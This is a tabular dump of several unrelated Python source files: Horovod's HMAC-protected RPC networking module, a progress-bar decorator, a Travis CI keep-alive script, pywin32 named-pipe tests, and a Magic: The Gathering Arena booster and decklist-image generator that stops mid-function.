source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
network.py
|
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
from horovod.run.util.network import find_port
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length into 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
class BasicService(object):
def __init__(self, service_name, key, nic):
self._service_name = service_name
self._wire = Wire(key)
self._nic = nic
self._server, _ = find_port(
lambda addr: socketserver.ThreadingTCPServer(
addr, self._make_handler()),
pedl_provisioned_port=0,
verbose=False,
)
self._port = self._server.socket.getsockname()[1]
self._addresses = self._get_local_addresses()
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def _get_local_addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
if self._nic and intf != self._nic:
continue
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
if not result and self._nic:
raise NoValidAddressesFound(
'No available network interface found matching user provided interface: {}'.format(self._nic))
return result
def addresses(self):
return self._addresses
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, verbose, match_intf=False,
probe_timeout=20, retries=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._verbose = verbose
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._retries = retries
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Horovodrun was unable to connect to {service_name} on any '
'of the following addresses: {addresses}.\n\n'
'One possible cause of this problem is that '
'horovodrun currently requires every host to have at '
'least one routable network interface with the same '
'name across all of the hosts. '
'You can run \"ifconfig -a\" '
'on every host and check for the common '
'routable interface. '
'To fix the problem, you can rename interfaces on '
'Linux.'.format(service_name=service_name, addresses=addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
if self._verbose >= 2:
# Need to find the local interface name whose
# address was visible to the target host's server.
resp_intf = ''
for key in psutil.net_if_addrs().keys():
key_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(key, [])]
if resp.source_address in key_intf_addrs:
resp_intf = key
break
print('WARNING: Expected to connect the host '
'{addr} using interface '
'{intf}, but reached it on interface '
'{resp_intf}.'.format(
addr=str(addr[0])+':'+str(addr[1]),
intf=intf,
resp_intf=resp_intf))
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._retries - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
|
progressbar.py
|
# -*- coding: utf-8 -*-
import sys
import time
import threading
from functools import wraps
def progressbar(function=None, char='.', pause=0.2, bar_len=60):
"""
This function is a decorator for a progess bar.
Use it as follows:
.. python code:
@progressbar
def any_function()
... do something ...
any_function()
..
"""
if function is None:
return lambda func: progressbar(func, char, pause, bar_len)
@wraps(function)
def wrapped_function(*args, **kwargs):
stop = False
def progress_bar():
while not stop:
sys.stdout.write(char)
sys.stdout.flush()
time.sleep(pause)
sys.stdout.write('\n Done. \n')
sys.stdout.flush()
try:
p = threading.Thread(target=progress_bar)
p.start()
return function(*args, **kwargs)
finally:
stop = True
return wrapped_function
|
travis_run.py
|
#!/usr/bin/env python
import sys
import time
import threading
import subprocess
# This script executes a long-running command while outputing "still running ..." periodically
# to notify Travis build system that the program has not hanged
PING_INTERVAL=15
def monitor(stop):
wait_time = 0
while True:
time.sleep(PING_INTERVAL)
wait_time += PING_INTERVAL
print(" + still running (" + str(wait_time) + "s) ...")
sys.stdout.flush()
if stop():
break
def execute(command):
process = subprocess.Popen(command, stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if output == '' and process.poll() is not None:
break
if output:
print output.strip()
sys.stdout.flush()
return process.returncode
def main(argv):
# start monitoring thread
stop_monitor = False
t = threading.Thread(target = monitor, args =(lambda : stop_monitor, ))
t.start()
# execute command
exitcode = execute(argv)
print(" + exitcode="+str(exitcode))
sys.stdout.flush()
# terminate monitoring thread
stop_monitor = True
t.join()
sys.exit(exitcode)
if __name__ == "__main__":
main(sys.argv[1:])
|
test_win32pipe.py
|
import unittest
import time
import threading
from pywin32_testutil import str2bytes # py3k-friendly helper
import win32pipe
import win32file
import win32event
import pywintypes
import winerror
import win32con
class PipeTests(unittest.TestCase):
pipename = "\\\\.\\pipe\\python_test_pipe"
def _serverThread(self, pipe_handle, event, wait_time):
# just do one connection and terminate.
hr = win32pipe.ConnectNamedPipe(pipe_handle)
self.failUnless(hr in (0, winerror.ERROR_PIPE_CONNECTED), "Got error code 0x%x" % (hr,))
hr, got = win32file.ReadFile(pipe_handle, 100)
self.failUnlessEqual(got, str2bytes("foo\0bar"))
time.sleep(wait_time)
win32file.WriteFile(pipe_handle, str2bytes("bar\0foo"))
pipe_handle.Close()
event.set()
def startPipeServer(self, event, wait_time = 0):
openMode = win32pipe.PIPE_ACCESS_DUPLEX
pipeMode = win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT
sa = pywintypes.SECURITY_ATTRIBUTES()
sa.SetSecurityDescriptorDacl ( 1, None, 0 )
pipe_handle = win32pipe.CreateNamedPipe(self.pipename,
openMode,
pipeMode,
win32pipe.PIPE_UNLIMITED_INSTANCES,
0,
0,
2000,
sa)
threading.Thread(target=self._serverThread, args=(pipe_handle, event, wait_time)).start()
def testCallNamedPipe(self):
event = threading.Event()
self.startPipeServer(event)
got = win32pipe.CallNamedPipe(self.pipename,str2bytes("foo\0bar"), 1024, win32pipe.NMPWAIT_WAIT_FOREVER)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeBlocking(self):
event = threading.Event()
self.startPipeServer(event)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
0, # win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), 1024, None)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeBlockingBuffer(self):
# Like testTransactNamedPipeBlocking, but a pre-allocated buffer is
# passed (not really that useful, but it exercises the code path)
event = threading.Event()
self.startPipeServer(event)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
0, # win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
buffer = win32file.AllocateReadBuffer(1024)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), buffer, None)
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
def testTransactNamedPipeAsync(self):
event = threading.Event()
overlapped = pywintypes.OVERLAPPED()
overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None)
self.startPipeServer(event, 0.5)
open_mode = win32con.GENERIC_READ | win32con.GENERIC_WRITE
hpipe = win32file.CreateFile(self.pipename,
open_mode,
0, # no sharing
None, # default security
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_OVERLAPPED,
None)
# set to message mode.
win32pipe.SetNamedPipeHandleState(
hpipe, win32pipe.PIPE_READMODE_MESSAGE, None, None)
buffer = win32file.AllocateReadBuffer(1024)
hr, got = win32pipe.TransactNamedPipe(hpipe, str2bytes("foo\0bar"), buffer, overlapped)
self.failUnlessEqual(hr, winerror.ERROR_IO_PENDING)
nbytes = win32file.GetOverlappedResult(hpipe, overlapped, True)
got = buffer[:nbytes]
self.failUnlessEqual(got, str2bytes("bar\0foo"))
event.wait(5)
self.failUnless(event.isSet(), "Pipe server thread didn't terminate")
if __name__ == '__main__':
unittest.main()
|
generator.py
|
import calendar
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from dateutil.tz import gettz
from hashlib import sha512
from operator import attrgetter
from os.path import exists, join
from re import sub
from threading import Thread
from PIL import Image, ImageDraw, ImageFont
import random
import re
from mtga.set_data import all_mtga_cards
from card_image_downloader import CardImageDownloader
from io import BytesIO
class Rarity():
TOKEN = "Token"
BASIC = "Basic"
COMMON = "Common"
UNCOMMON = "Uncommon"
RARE = "Rare"
MYTHIC_RARE = "Mythic Rare"
class N_IN_PACK():
BASIC = 1
COMMON = 10
UNCOMMON = 3
RARE = 1
class Mode():
MONTHLY = "monthly"
WEEKLY = "weekly"
DAILY = "daily"
RANDOM = "random"
STATIC = "static"
class Key():
DECK = "deck"
SIDEBOARD = "sideboard"
CREATURE = "creature"
NONCREATURE = "noncreature"
LAND = "land"
BASIC = "basic"
NONBASIC = "nonbasic"
MV_1 = "-1"
MV_2 = "2"
MV_3 = "3"
MV_4 = "4"
MV_5 = "5"
MV_6 = "6-"
class CardImage():
WIDTH = 265
HEIGHT = 370
HEIGHT_MARGIN = 74
COLUMN_MARGIN = 20
ROW_MARGIN = 10
class Generator():
TZ_UTC = gettz("UTC")
MONTHLY_RESET_HOUR = 20
WEEKLY_RESET_HOUR = 8
DAILY_RESET_HOUR = 8
MYTHIC_RARE_RATE = 1 / 7.4
BASIC_LANDS = ["平地", "島", "沼", "山", "森", "Plains", "Island", "Swamp", "Mountain", "Forest"]
ALCHEMY_PREFIX = "A-"
def __init__(self, pool=all_mtga_cards, card_image_cache_dir='.'):
self.downloader = CardImageDownloader(language='Japanese', json_dir='set_data')
self.cards = pool.cards
self.sets = self.get_sets()
self.set_info = {}
for set in self.sets:
self.set_info[set] = {}
cards = self.get_cards(set=set, rarity=Rarity.MYTHIC_RARE)
self.set_info[set][Rarity.MYTHIC_RARE] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.RARE)
self.set_info[set][Rarity.RARE] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.UNCOMMON)
self.set_info[set][Rarity.UNCOMMON] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.COMMON)
self.set_info[set][Rarity.COMMON] = len(cards)
cards = self.get_cards(set=set, rarity=Rarity.BASIC)
self.set_info[set][Rarity.BASIC] = len(cards)
self.card_image_cache_dir = card_image_cache_dir
def add_card(self, set, rarity, picked_cards):
cards = self.get_cards(set=set, rarity=rarity)
while True:
card = cards[random.randrange(0, len(cards))]
if card not in picked_cards:
picked_cards.append(card)
return picked_cards
def open_boosters(self, user_id, sets, pack_nums, mode=None, index_dt=None):
pool = []
for i in range(len(sets)):
if sets[i] and pack_nums[i]:
# 乱数初期化
random.seed(self.get_seed(user_id, sets[i], mode, index_dt))
# パックを剥く
cards = []
for _ in range(pack_nums[i]):
cards += self.open_booster(sets[i])
cards = self.sort_cards_by_set_number(cards)
pool += cards
return pool
def open_booster(self, set):
if set and not self.sealedable(set):
return None
cards = []
# レア/神話レア
if set and self.set_info[set][Rarity.MYTHIC_RARE] == 0:
for _ in range(N_IN_PACK.RARE):
cards = self.add_card(
set=set,
rarity=Rarity.RARE,
picked_cards=cards
)
else:
for _ in range(N_IN_PACK.RARE):
cards = self.add_card(
set=set,
rarity=Rarity.MYTHIC_RARE if random.random() < self.MYTHIC_RARE_RATE else Rarity.RARE,
picked_cards=cards
)
# アンコモン
for _ in range(N_IN_PACK.UNCOMMON):
cards = self.add_card(set=set, rarity=Rarity.UNCOMMON, picked_cards=cards)
# コモン
for _ in range(N_IN_PACK.COMMON):
cards = self.add_card(set=set, rarity=Rarity.COMMON, picked_cards=cards)
# 基本土地
if set and self.set_info[set][Rarity.BASIC] > 0:
for _ in range(N_IN_PACK.BASIC):
cards = self.add_card(set=set, rarity=Rarity.BASIC, picked_cards=cards)
return cards
def get_cards(self, name="", pretty_name="", cost=None, color_identity=None, card_type="", sub_type="", super_type="",
ability="", set="", rarity="", collectible=True, set_number=0, mtga_id=0,
is_token=False, is_secondary_card=False, is_rebalanced=False):
cards = []
for card in self.cards:
if name and card.name != name:
continue
if pretty_name and card.pretty_name != pretty_name:
continue
if cost and card.cost != cost:
continue
if color_identity and card.color_identity != color_identity:
continue
if card_type and card.card_type != card_type:
continue
if sub_type and not sub_type in card.sub_types:
continue
if super_type and not super_type in card.super_type:
continue
if ability and not ability in card.abilities:
continue
if set and card.set != set:
continue
if rarity and card.rarity != rarity:
continue
if card.collectible != collectible:
continue
if set_number and card.set_number != set_number:
continue
if mtga_id and card.mtga_id != mtga_id:
continue
if card.is_token != is_token:
continue
if card.is_secondary_card != is_secondary_card:
continue
if card.is_rebalanced != is_rebalanced:
continue
cards.append(card)
return cards
def get_sets(self):
sets = []
for card in self.get_cards():
if card.set and card.set not in sets:
sets.append(card.set)
return sets
def validate_decklist(self, decklist, pool):
decklist_pool = self.cards_to_decklist_cards(pool, True)
decklist_deck = self.decklist_to_decklist_cards(decklist, True)
invalid_cards = {}
for deck_key in decklist_deck:
if deck_key in self.BASIC_LANDS:
continue
elif deck_key in decklist_pool.keys():
num_diff = int(decklist_pool[deck_key]) - int(decklist_deck[deck_key])
if num_diff < 0:
invalid_cards[deck_key] = abs(num_diff)
else:
invalid_cards[deck_key] = decklist_deck[deck_key]
return invalid_cards
def sealedable(self, set):
if self.set_info[set][Rarity.RARE] < N_IN_PACK.RARE:
return False
if self.set_info[set][Rarity.UNCOMMON] < N_IN_PACK.UNCOMMON:
return False
if self.set_info[set][Rarity.COMMON] < N_IN_PACK.COMMON:
return False
return True
def decklist_cards_to_cards(self, decklist_cards, name_only=False):
rst = []
for key in decklist_cards.keys():
n = decklist_cards[key]
if name_only:
name = key
set = ""
set_number = 0
else:
name = " ".join(key.split()[0:-2])
set = key.split()[-2].strip("()")
set_number = int(key.split()[-1])
if name.startswith(self.ALCHEMY_PREFIX):
pretty_name = sub("^"+self.ALCHEMY_PREFIX, "", name)
is_rebalanced = True
else:
pretty_name = name
is_rebalanced = False
cards = self.get_cards(pretty_name=pretty_name, set=set, set_number=set_number, is_rebalanced=is_rebalanced)
if cards:
for _ in range(n):
rst.append(cards[-1])
return rst
def strip_invalid_cards_from_decklist(self, decklist, invalid_cards):
deck, sideboard = self.separate_decklist_to_deck_and_sideboard(decklist)
deck_cards = self.decklist_to_decklist_cards(deck)
sideboard_cards = self.decklist_to_decklist_cards(sideboard)
sideboard_cards, invalid_cards = self.strip_invalid_cards_from_decklist_cards(sideboard_cards, invalid_cards)
if invalid_cards:
deck_cards, invalid_cards = self.strip_invalid_cards_from_decklist_cards(deck_cards, invalid_cards)
deck = self.decklist_cards_to_decklist(deck_cards)
sideboard = self.decklist_cards_to_decklist(sideboard_cards, is_sideboard=True)
return deck + "\n" + sideboard
def strip_invalid_cards_from_decklist_cards(self, decklist_cards, invalid_cards):
for invalid_card in invalid_cards.keys(): # invalid_card: カード名
for decklist_card in decklist_cards.keys(): # decklist_card: カード名 (セット名) セット番号
if decklist_card.startswith(invalid_card+" "):
if decklist_cards[decklist_card] > invalid_cards[invalid_card]:
decklist_cards[decklist_card] -= invalid_cards[invalid_card]
invalid_cards[invalid_card] = 0
break
elif decklist_cards[decklist_card] == invalid_cards[invalid_card]:
decklist_cards[decklist_card] = 0
invalid_cards[invalid_card] = 0
break
elif decklist_cards[decklist_card] < invalid_cards[invalid_card]:
invalid_cards[invalid_card] -= decklist_cards[decklist_card]
decklist_cards[decklist_card] = 0
for key in [k for k in decklist_cards.keys() if decklist_cards[k] == 0]:
del decklist_cards[key]
for key in [k for k in invalid_cards.keys() if invalid_cards[k] == 0]:
del invalid_cards[key]
return decklist_cards, invalid_cards
def get_diff_cards(self, pool, decklist):
pool_cards = self.cards_to_decklist_cards(pool)
decklist_cards = self.decklist_to_decklist_cards(decklist, name_only=True)
diff_cards, _ = self.strip_invalid_cards_from_decklist_cards(pool_cards, decklist_cards)
return diff_cards
def add_diff_to_sideboard(self, decklist, pool):
adding_cards = self.get_diff_cards(pool, decklist)
adding_str = self.decklist_cards_to_decklist(adding_cards, is_sideboard=True)
if "サイドボード\n" in decklist or "Sideboard\n" in decklist:
adding_str = adding_str.replace("サイドボード\n", "").replace("Sideboard\n", "")
else:
adding_str = "\n"+adding_str
return decklist + adding_str
@classmethod
def decklist_to_decklist_cards(cls, decklist, name_only=False):
decklist_cards = {}
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if re.match(r'^[1-9]', line):
num = int(line.split()[0])
if name_only:
decklist_card_str = " ".join(line.split()[1:-2])
else:
decklist_card_str = " ".join(line.split()[1:])
if decklist_cards.get(decklist_card_str): # デッキとサイドボードに分かれている可能性があるため
decklist_cards[decklist_card_str] += num
else:
decklist_cards[decklist_card_str] = num
return decklist_cards
@classmethod
def parse_decklist(cls, decklist): # rst[カード名] = [セット略号, コレクター番号]
rst = {}
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if re.match(r'^[1-9]', line):
splited_line = line.split()
name = " ".join(splited_line[1:-2])
if name not in rst.keys():
set = splited_line[-2].strip("()")
number = int(splited_line[-1])
rst[name] = [set, number]
return rst
def download_decklist_card_image(self, decklist):
# デッキリストをパース
parsed_decklist = self.parse_decklist(decklist)
# パースしたデッキリストからセット一覧を取得
sets = []
for key in parsed_decklist.keys():
set = parsed_decklist[key][0]
if set not in sets:
sets.append(set)
# セット毎にカード画像を並列で取得
print("カード画像の取得を開始")
threads = []
for set in sets:
threads.append(Thread(target=self.download_set_card_image_from_parsed_decklist, args=(parsed_decklist, set)))
threads[-1].start()
for thread in threads:
thread.join()
print("カード画像の取得が完了")
def download_set_card_image_from_parsed_decklist(self, parsed_decklist, set):
# セットのカード一覧を取得
self.downloader.get_set_cards(set)
# パースしたデッキリストの各カードについて、対象セットのカード画像を並列ダウンロード
threads = []
for key in parsed_decklist.keys():
if parsed_decklist[key][0] == set:
name = key
number = parsed_decklist[key][1]
if name.startswith(self.ALCHEMY_PREFIX): # アルケミー対応
#name = sub("^"+self.ALCHEMY_PREFIX, "", name, 1)
number = self.ALCHEMY_PREFIX+str(number)
threads.append(Thread(target=self.get_card_image_path, args=(name, set, number)))
threads[-1].start()
for thread in threads:
thread.join()
@classmethod
def get_pack_num(cls, mode):
# 月初からの週数に応じて剥くパック数を決定
if mode == Mode.MONTHLY:
td = datetime.now(tz=cls.TZ_UTC) - cls.get_index_datetime(mode)
if td.days < 7:
pack_num = 4
elif td.days < 14:
pack_num = 6
elif td.days < 21:
pack_num = 9
else:
pack_num = 12
else:
pack_num = 6
return pack_num
@classmethod
def get_index_datetime(cls, mode, index_dt=None):
now = datetime.now(cls.TZ_UTC)
if mode == Mode.MONTHLY:
if (now+timedelta(days=1)).day == 1 and now.hour >= cls.MONTHLY_RESET_HOUR: # 翌日が1日=今日が月末日
dt = datetime(now.year, now.month, now.day, cls.MONTHLY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month - 1, calendar.monthrange(now.year, now.month - 1)[1], cls.MONTHLY_RESET_HOUR, tzinfo=cls.TZ_UTC) # 前月の月末日
elif mode == Mode.WEEKLY:
if now.weekday == 6 and now.hour > cls.WEEKLY_RESET_HOUR: # 当日が日曜の場合
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC) - timedelta(days=now.weekday()+1)
elif mode == Mode.DAILY:
if now.hour > cls.DAILY_RESET_HOUR:
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC)
else:
dt = datetime(now.year, now.month, now.day, cls.WEEKLY_RESET_HOUR, tzinfo=cls.TZ_UTC) - timedelta(days=1)
elif mode == Mode.STATIC and index_dt:
dt = index_dt
else:
dt = now
return dt
@classmethod
def get_next_index_datetime(cls, mode):
index_dt = cls.get_index_datetime(mode)
if mode == Mode.MONTHLY:
dt = index_dt + relativedelta(months=1)
elif mode == Mode.WEEKLY:
dt = index_dt + timedelta(days=7)
elif mode == Mode.DAILY:
dt = index_dt + timedelta(days=1)
elif mode == Mode.RANDOM:
dt = index_dt
elif mode == Mode.STATIC:
dt = None
else:
dt = None
return dt
@classmethod
def get_seed(cls, user_id, set, mode, index_dt=None):
return cls.get_hashed_int(
user_id=user_id,
set=set,
timestamp=cls.get_index_datetime(mode, index_dt).timestamp()
)
@classmethod
def get_hashed_int(cls, user_id, set, timestamp):
hash_str = user_id + "@" + set + "@" + str(timestamp)
hash_bytes = hash_str.encode(encoding="utf-8")
hashed_bytes = sha512(hash_bytes)
hashed_int = int(hashed_bytes.hexdigest(), 16)
return hashed_int
@classmethod
def cards_to_decklist(cls, cards):
decklist_cards = cls.cards_to_decklist_cards(cards)
decklist = cls.decklist_cards_to_decklist(decklist_cards)
return decklist
@classmethod
def cards_to_decklist_cards(cls, cards, name_only=False):
decklist_cards = {}
for card in cards:
pretty_name = cls.ALCHEMY_PREFIX+card.pretty_name if card.is_rebalanced else card.pretty_name
if name_only:
decklist_card_str = pretty_name
else:
decklist_card_str = pretty_name + " (" + card.set + ") " + str(card.set_number)
if decklist_card_str not in decklist_cards:
decklist_cards[decklist_card_str] = 1
else:
decklist_cards[decklist_card_str] += 1
return decklist_cards
@classmethod
def decklist_cards_to_decklist(cls, decklist_cards, name_only=False, is_sideboard=False):
decklist = ("デッキ" if not is_sideboard else "サイドボード")+"\n"
for key in decklist_cards.keys():
if decklist_cards[key] == 0:
continue
if name_only:
decklist += str(decklist_cards[key]) + " " + " ".join(key.split()[0:-2]) + "\n"
else:
decklist += str(decklist_cards[key]) + " " + key + "\n"
return decklist
@classmethod
def sort_cards_by_set_number(cls, cards):
set_numbers = []
results = []
for card in cards:
set_numbers.append(card.set_number)
set_numbers.sort()
for set_number in set_numbers:
for card in cards:
if card.set_number == set_number:
results.append(card)
break
return results
@classmethod
def separate_decklist_to_deck_and_sideboard(cls, decklist):
is_deck = True
deck = "デッキ\n"
sideboard = "サイドボード\n"
decklist_lines = decklist.splitlines()
for line in decklist_lines:
if line in ["サイドボード", "Sideboard"]:
is_deck = False
elif re.match(r'^[0-9]', line):
if is_deck:
deck += line + "\n"
else:
sideboard += line + "\n"
return deck, sideboard
@classmethod
def cards_to_decklist_image_array(cls, cards):
rst = {
Key.CREATURE: {
Key.MV_1: [],
Key.MV_2: [],
Key.MV_3: [],
Key.MV_4: [],
Key.MV_5: [],
Key.MV_6: []
},
Key.NONCREATURE: {
Key.MV_1: [],
Key.MV_2: [],
Key.MV_3: [],
Key.MV_4: [],
Key.MV_5: [],
Key.MV_6: []
},
Key.LAND: {
Key.BASIC: [],
Key.NONBASIC: []
}
}
for card in cards:
if card.is_creature_card:
key1 = Key.CREATURE
elif card.is_noncreature_spell_card:
key1 = Key.NONCREATURE
elif card.is_land_card:
key1 = Key.LAND
if key1 != Key.LAND:
if card.cmc <= 1:
key2 = Key.MV_1
elif card.cmc == 2:
key2 = Key.MV_2
elif card.cmc == 3:
key2 = Key.MV_3
elif card.cmc == 4:
key2 = Key.MV_4
elif card.cmc == 5:
key2 = Key.MV_5
elif card.cmc >= 6:
key2 = Key.MV_6
else:
if card.pretty_name in cls.BASIC_LANDS:
key2 = Key.BASIC
else:
key2 = Key.NONBASIC
rst[key1][key2].append(card)
return rst
def decklist_to_decklist_image_array(self, decklist):
rst = {
Key.DECK: {},
Key.SIDEBOARD: {}
}
deck, sideboard = self.separate_decklist_to_deck_and_sideboard(decklist)
deck_cards = self.decklist_cards_to_cards(self.decklist_to_decklist_cards(deck))
sideboard_cards = self.decklist_cards_to_cards(self.decklist_to_decklist_cards(sideboard))
rst[Key.DECK] = self.cards_to_decklist_image_array(deck_cards)
rst[Key.SIDEBOARD] = self.cards_to_decklist_image_array(sideboard_cards)
for key0 in rst.keys(): # DECK, SIDEBOARD
for key1 in rst[key0].keys(): # CREATURE, NONCREATURE, LAND
for key2 in rst[key0][key1].keys(): # MV_n, BASIC, NONBASIC
rst[key0][key1][key2].sort(key=attrgetter('cmc', 'set_number', 'set'))
return rst
def generate_decklist_image_from_decklist(self, decklist):
self.download_decklist_card_image(decklist)
decklist_image_array = self.decklist_to_decklist_image_array(decklist)
image = self.generate_decklist_image_from_array(decklist_image_array)
return image
def generate_decklist_image_from_array(self, decklist_image_array):
images = {}
#TODO
#for key0 in decklist_image_array.keys(): # DECK, SIDEBOARD
key0 = Key.DECK
for key1 in decklist_image_array[key0].keys(): # CREATURE, NONCREATURE, LAND
images[key1] = self.generate_image_from_array(decklist_image_array[key0][key1], key1 == Key.LAND)
image = Image.new('RGBA', (
max(images[Key.CREATURE].width, images[Key.NONCREATURE].width) + CardImage.ROW_MARGIN + images[Key.LAND].width,
max(images[Key.CREATURE].height + CardImage.COLUMN_MARGIN + images[Key.NONCREATURE].height, images[Key.LAND].height)
))
image.alpha_composite(images[Key.CREATURE], (0, 0))
image.alpha_composite(images[Key.NONCREATURE], (0, images[Key.CREATURE].height + CardImage.COLUMN_MARGIN))
image.alpha_composite(images[Key.LAND], (max(images[Key.CREATURE].width, images[Key.NONCREATURE].width) + CardImage.ROW_MARGIN, 0))
return image
def generate_image_from_array(self, image_array, is_land=False):
if not is_land:
n = 0
for key in image_array.keys(): #マナコスト
n = max(n, len(image_array[key]))
decklist_image = Image.new('RGBA', (
CardImage.WIDTH * len(image_array.keys()) + CardImage.ROW_MARGIN * (len(image_array.keys())-1),
CardImage.HEIGHT_MARGIN*(n-1) + CardImage.HEIGHT
))
x = 0
y = 0
for key in image_array.keys():
for card in image_array[key]:
self.composite_card_image(decklist_image, card, (x, y))
y += CardImage.HEIGHT_MARGIN
x += CardImage.WIDTH + CardImage.ROW_MARGIN
y = 0
else:
basic_land_nums = {}
for basic_land_card in image_array[Key.BASIC]:
if basic_land_card.pretty_name in basic_land_nums.keys():
basic_land_nums[basic_land_card.pretty_name] += 1
else:
basic_land_nums[basic_land_card.pretty_name] = 1
n = len(basic_land_nums) + len(image_array[Key.NONBASIC])
decklist_image = Image.new('RGBA', (
CardImage.WIDTH,
